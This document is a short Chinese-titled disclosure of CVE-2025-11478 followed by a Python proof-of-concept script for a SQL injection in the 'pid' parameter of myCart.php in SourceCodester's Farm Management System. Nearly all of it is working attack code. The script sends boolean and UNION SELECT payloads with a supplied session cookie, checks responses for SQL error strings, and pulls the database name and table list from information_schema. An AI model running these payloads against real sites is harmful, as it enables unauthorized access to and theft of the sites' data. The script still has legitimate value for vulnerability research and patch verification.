CVE-2025-11478：SourceCodester农场管理系统SQL注入漏洞

# CVE-2025-11478 - SourceCodester Farm Management System SQL Injection PoC # Vulnerability: SQL Injection via 'pid' parameter in /myCart.php # Author: DrNbnonono import requests import sys TARGET_URL = "http://target.com/myCart.php" def exploit_sql_injection(target_url, session_cookie): """ Exploit SQL injection in the pid parameter of myCart.php """ # Basic SQL injection payload to test the vulnerability payload = "1' OR '1'='1" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Cookie": session_cookie, "Content-Type": "application/x-www-form-urlencoded" } params = { "pid": payload } try: response = requests.get(target_url, params=params, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Request successful - Status: {response.status_code}") print(f"[+] Response length: {len(response.text)}") # Check for SQL error messages indicating vulnerability sql_errors = [ "You have an error in your SQL syntax", "mysql_fetch_array()", "mysql_num_rows()", "Warning: mysql", "unclosed quotation mark" ] for error in sql_errors: if error.lower() in response.text.lower(): print(f"[+] SQL Injection confirmed! Error pattern found: {error}") return True # UNION-based injection to extract data union_payload = "1' UNION SELECT 1,2,3,4,5-- -" params["pid"] = union_payload response = requests.get(target_url, params=params, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] UNION injection test - Response length: {len(response.text)}") return True else: print(f"[-] Request failed - Status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def extract_database_info(target_url, session_cookie): """ Extract database information using UNION-based SQL injection """ headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Cookie": session_cookie } # Extract database name payload = "1' UNION SELECT database(),2,3,4,5-- -" params = {"pid": payload} response = requests.get(target_url, params=params, headers=headers, timeout=10) print(f"[+] Database info response: {response.text[:500]}") # Extract table names payload_tables = "1' UNION SELECT group_concat(table_name),2,3,4,5 FROM information_schema.tables WHERE table_schema=database()-- -" params["pid"] = payload_tables response = requests.get(target_url, params=params, headers=headers, timeout=10) print(f"[+] Tables: {response.text[:500]}") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_url> <session_cookie>") print(f"Example: {sys.argv[0]} http://target.com/myCart.php 'PHPSESSID=abc123'") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] print(f"[*] Targeting: {target}") print(f"[*] Testing SQL injection vulnerability...") if exploit_sql_injection(target, cookie): print("[+] Vulnerability confirmed! Extracting data...") extract_database_info(target, cookie) else: print("[-] Target may not be vulnerable or requires authentication")